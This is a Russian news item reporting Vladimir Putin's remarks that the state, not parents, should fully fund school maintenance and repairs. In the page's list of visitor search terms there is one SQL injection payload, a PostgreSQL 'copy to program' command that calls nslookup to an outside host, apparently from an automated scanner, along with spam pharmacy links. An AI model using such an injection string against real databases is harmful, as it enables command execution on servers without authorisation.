Последние новости
Новости образования /

Содержание школ даже добровольно не должны оплачивать родители

Родители учеников даже добровольно не должны участвовать в финансировании содержания и ремонта школ, это стопроцентная обязанность государства, заявил премьер-министр РФ Владимир Путин на встрече с учителями в московской школе 1060.

"Государство должно оплачивать весь процесс образования, содержание, ремонт школы, а также оборудования", - сказал Путин.

По его словам, если речь идет о добровольных взносах, "то даже этого не нужно, потому что добровольность может вылиться в обязательную квазидобровольность".

"Мое глубокое убеждение, что родителям нельзя запрещать это делать, но разрешать это делать по всем направлениям тоже неправильно", - сказал премьер.

"Государство должно нести стопроцентную нагрузку за содержание и развитие образования", - заявил Путин.

При этом он отметил, что родители могут оплачивать какие-то дополнительные мероприятия, например, туристические походы их детей, или другие мероприятия, не связанные с основным процессом обучения.

"Что касается основного процесса обучения, содержания зданий и сооружений, оборудования и так далее, здесь не предполагается вообще (финансовое) участие родителей", - сообщил премьер.

Он отметил, что подобное участие родителей может быть опасным, так как у всех разное финансовое положение.

Рерайт магистерской диссертации по материалам www.diplomnyeraboty.ru.
У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-1976.1964.a87b3.1.bxss.me
  • testing
  • http://alprostadil.pro
  • 'check and repair refrigerator compressor' 'pdf'
  • http://kamagra-bestellen.tk
имя


Популярые сообщения